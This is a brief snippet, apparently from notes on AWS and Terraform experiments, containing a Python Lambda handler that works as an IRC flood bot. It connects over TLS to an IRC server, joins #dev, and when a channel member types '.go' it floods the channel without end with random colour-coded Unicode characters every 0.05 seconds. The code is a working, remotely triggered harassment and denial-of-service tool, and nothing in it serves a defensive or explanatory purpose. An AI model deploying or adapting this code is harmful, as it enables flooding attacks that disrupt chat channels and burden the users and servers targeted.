
- experiments in aws with terraform
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      1 #!/usr/bin/env python
      2 import random,socket,ssl,time
      3 def lambda_handler(event, context):
      4 	def raw(msg) : sock.send(bytes(msg + '\r\n', 'utf-8'))
      5 	def rnd(size): return ''.join(random.choices('aAbBcCdDeEfFgGhHiIjJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ0123456789', k=size))
      6 	sock = ssl.wrap_socket(socket.socket())
      7 	sock.connect(('', 6697))
      8 	raw(f'USER {rnd(5)} 0 * :' + rnd(5))
      9 	raw('NICK ' + rnd(5))
     10 	while True:
     11 		try:
     12 			data = sock.recv(1024).decode('utf-8')
     13 			for line in (line for line in data.split('\r\n') if len(line.split()) >= 2):
     14 				args = line.split()
     15 				if args[0] == 'PING' : raw('PONG ' + args[1][1:])
     16 				elif args[1] == '001':
     17 					time.sleep(3)
     18 					raw('JOIN #dev')
     19 				elif args[1] == 'PRIVMSG' and len(args) == 4:
     20 					msg = ' '.join(args[3:])[1:]
     21 					if msg == '.go':
     22 						curr = 4096
     23 						while True:
     24 							unistr = [chr(item) for item in range(curr,curr+50)]
     25 							sender = ''
     26 							for item in unistr:
     27 								sender = sender + '\x03'+str(random.randint(2,256)) + random.choice(['\x1f','\x02','\x16','']) + item + '\x0f'
     28 							raw('PRIVMSG #dev :' + sender)
     29 							curr = random.randint(4096,1114100)
     30 							time.sleep(0.05)
     31 		except (UnicodeDecodeError,UnicodeEncodeError):
     32 			pass